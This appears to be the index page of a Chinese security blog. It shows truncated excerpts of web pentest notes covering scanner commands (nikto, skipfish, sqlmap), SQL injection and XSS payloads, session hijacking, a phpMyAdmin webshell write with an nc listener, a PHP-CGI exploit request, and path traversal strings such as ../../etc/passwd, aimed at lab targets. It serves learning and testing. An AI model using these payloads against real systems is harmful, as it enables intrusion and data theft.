f1gure的博客

nikto -update 升级数据库和插件nikto -host 192.168.1.109 -port 80 指定host和端口号扫描nikto -host www.baidu.com -port 443 -ssl 扫描https网站nikto -host hosts.txt 扫描文本文件里的网站nmap -p80 192.168.1.0/24 -oG - | nikto -h

基于布尔的检测• 1’ and ‘1’=‘1  /  1’and ‘1 • 1’ and ‘1’=‘2  /  1’and ‘0看查询几个字段：• ‘ order by 9--               (-- )是查询字段联合查询：• ’ union select 1,2--+    看第一个字段和第二个字段名称• ’ union all select database(),2--+Selec...

提交的内容被服务器原封不动的返回，则可能出现漏洞。Xss漏洞分为存储型、反射型、DOM型反射型：检测代码：<script> alert(‘XSS’); </script>    弹出一个警告窗口<a href='' onclick=alert('xss')>type</a>        建立一个点击，点击后弹出警告窗口<img src=htt...

Session ID的利用：截取目标session ID利用firefox浏览器的tools > cookies manager功能导入IE获取session ID方法：F12开发人员工具>缓存 找回密码理想实验：https://www.example.com/reset?email=user@example.com&key=b4c9a289323b21a01c3e940f15...

/phpmyadmin/setupPOST请求漏洞写入静态PHP木马：效果：写入PHP动态木马：（修改3.php）打开nc侦听端口：写入：(成功)Ubuntu/debian默认安装PHP5-cgi：POST/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E %63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%6...

Target,proxy模块invisible代理 ：针对多域名对应同一ip或者多ip对应同一域名情况代理https网站需要证书导入 ：proxy ➡️ options ➡️ ca certificate ➡️ certificate in DER formate ➡️ next         保存的证书导入到浏览器中截断服务器返回客户端的数据包 ：proxy➡️Options➡️interce...

配置靶机：     → 重启apache服务：经典测试方法：•?file=../../../../etc/passwd •?page=file:///etc/passwd •?home=main.cgi  •?page=http://www.a.com/1.php •http://1.1.1.1/../../../../dir/file.txt 绕过过滤检测方法部分服务器防御机制：在路径后面添加....

skipfish -o test http://192.168.1.101/dvwa                                对指定网站进行扫描并保存在test文件夹下skipfish -o test @url.txt              对txt文件内的域名进行扫描skipfish -A user:pass -o text  http://192.168.1.

vega重点关注web application方面的代码漏洞，比如sql注入、跨站等sudo dhclient eth0  给metaspolitable重新获取ip地址 proxy模式：手工扒站 scanner模式：自动扒站  使用上面的useragent阻止浏览器缓存内容：增加流量，提高漏洞发现可能性记录所有请求；显示详细扫描信息编辑扫描模块

get方式检查方法：sqlmap -u "网址" post方法检查方法：1.sqlmap -u "网址" --data "post参数=post数据"2.sqlmap -r x.txt   直接根据请求包注入，在请求包里每个消息头最后加*，就是添加对该信息头的注入cookie方式检测方法：sqlmap -u "网址" --cookie "cookie值"不同数据库注入方法：access数据库：判断...